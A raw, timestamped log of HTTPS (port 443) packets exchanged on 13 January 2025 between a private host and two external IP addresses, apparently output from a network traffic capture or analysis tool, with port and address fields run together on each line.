                                                      Jan 13, 2025 00:47:47.514275074 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.514359951 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.514411926 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.514411926 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.514421940 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.515077114 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.515332937 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.515340090 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.515387058 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.515815973 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.516036034 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.558980942 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.559072971 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.580626965 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.580734015 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.581279039 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.581391096 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.581444025 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.581458092 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.581496000 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.582513094 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.582592964 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.582600117 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.582640886 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.582647085 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.582782984 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.582839012 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.655677080 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.669712067 CET49780443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.669744015 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.670258999 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.674652100 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.686707973 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.686877966 CET49773443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.687807083 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.687835932 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.687906027 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.688142061 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.688185930 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.688236952 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.688401937 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.688477039 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.688555956 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.689383030 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.689389944 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.689763069 CET49780443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.689781904 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.689870119 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.690059900 CET49781443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.690068007 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.690352917 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.690366030 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.690561056 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.690574884 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.690716028 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.690754890 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.690880060 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.690891027 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.691020966 CET49780443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.691185951 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.722287893 CET49781443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.722470045 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.728626966 CET49781443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.731328964 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.732131958 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.732239962 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.732291937 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.732291937 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.732305050 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.732440948 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.732494116 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.732587099 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.733091116 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.733222961 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.733524084 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.733584881 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.733971119 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.734049082 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.734080076 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.734134912 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.734818935 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.734898090 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.734906912 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.734932899 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.734987020 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.735583067 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.735678911 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.735732079 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.735732079 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.735740900 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.735780954 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.735861063 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.735868931 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.735925913 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.736598015 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.736769915 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.771352053 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.776135921 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.777185917 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.777488947 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.777981997 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.778065920 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.789572954 CET49773443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.789611101 CET4434977320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.791332006 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.791387081 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.791620016 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.792578936 CET49779443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:47.792591095 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.793061972 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.793612003 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.793643951 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.794357061 CET49779443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:47.794435024 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.794907093 CET49779443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:47.810672045 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.813782930 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.813798904 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.814271927 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.814353943 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.814486980 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.818568945 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.818604946 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.819000959 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.819084883 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.835356951 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.905503988 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.908248901 CET49782443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.908279896 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.909452915 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.910036087 CET49782443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.910170078 CET49782443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.910181999 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.910219908 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.925192118 CET49789443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:47.925249100 CET44349789154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.925898075 CET49789443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:47.926299095 CET49789443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:47.926325083 CET44349789154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:47.950798988 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.950880051 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.950921059 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.950965881 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.951129913 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.951193094 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.951308012 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.951384068 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.951617956 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.951680899 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.952033043 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.952111006 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.952150106 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.952260971 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.952292919 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.952302933 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.952341080 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.952415943 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.953368902 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.953469992 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.953520060 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.953520060 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.953527927 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.953566074 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.953588009 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.953641891 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.955847025 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.955934048 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.956084013 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.956183910 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.956198931 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.956207037 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.956238985 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.956263065 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.956816912 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.956876040 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.957611084 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.957665920 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.957777023 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.957904100 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.958225012 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.958278894 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.958419085 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.958475113 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.958653927 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.958762884 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.959326029 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.959393978 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.960499048 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.960591078 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.960700989 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.960762024 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.960906982 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.960963011 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.961170912 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.961354017 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.961389065 CET49782443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.965473890 CET49790443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.965522051 CET4434979020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.965599060 CET49790443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.965784073 CET49790443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.965800047 CET4434979020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.967011929 CET49791443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.967048883 CET4434979120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.967112064 CET49791443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.967268944 CET49791443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.967282057 CET4434979120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.995532036 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.995609045 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.995692015 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.995758057 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:47.995778084 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:47.995841980 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.037462950 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.037568092 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.037604094 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.037616968 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.037637949 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.037653923 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.037671089 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.037678957 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.037758112 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.170423985 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.170490026 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.171016932 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.171061039 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.171092987 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.171137094 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.171413898 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.171462059 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.171471119 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.171509027 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.171557903 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.171602964 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.172055006 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.172070026 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.172422886 CET49793443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.172458887 CET4434979320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.172530890 CET49793443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.173353910 CET49793443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.173383951 CET4434979320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.188030005 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.188055992 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.188123941 CET49780443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.188162088 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.188447952 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.188497066 CET49780443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.189398050 CET49780443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.189420938 CET4434978020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.189811945 CET49794443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.189862967 CET4434979420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.189925909 CET49794443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.192470074 CET49794443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.192488909 CET4434979420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.215800047 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.215990067 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.216031075 CET49781443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.216401100 CET49781443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.216415882 CET4434978120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.216717005 CET49795443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.216744900 CET4434979520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.216813087 CET49795443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.217772007 CET49795443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.217797995 CET4434979520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.442703009 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.442775011 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.442841053 CET49782443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.444022894 CET49782443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.444051027 CET4434978220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.444556952 CET49796443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.444611073 CET4434979620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.444681883 CET49796443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.458482981 CET49796443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.458523035 CET4434979620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.482304096 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:48.482485056 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:48.482536077 CET49779443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:48.485415936 CET49779443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:48.485431910 CET44349779154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:48.520791054 CET49797443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:48.520837069 CET44349797154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:48.520903111 CET49797443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:48.521070004 CET49797443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:48.521086931 CET44349797154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:48.599236965 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.599440098 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.599453926 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.602243900 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.602322102 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.602860928 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.602953911 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.603420973 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.603429079 CET4434978320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.605714083 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.605911970 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.605937958 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.607019901 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.607079983 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.607353926 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.607412100 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.607487917 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.607494116 CET4434978620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.627835035 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.628050089 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.628057957 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.629548073 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.629740000 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.629762888 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.630904913 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.630960941 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.631325006 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.631396055 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.631474972 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.631479979 CET4434978420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.632767916 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.632836103 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.633191109 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.633279085 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.633337975 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.633356094 CET4434978520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.648597956 CET49783443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.648675919 CET49786443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.679507971 CET49785443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.714449883 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.714715004 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.714747906 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.715179920 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.715475082 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.715578079 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.715588093 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.716383934 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.716563940 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.716581106 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.716882944 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.717144966 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.717207909 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.717236042 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.759376049 CET49788443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.759437084 CET4434978820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.763322115 CET4434978720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:48.788477898 CET49784443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.788484097 CET49787443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:48.820476055 CET44349789154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:48.820741892 CET49789443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:48.820760012 CET44349789154.86.18.4192.168.2.4
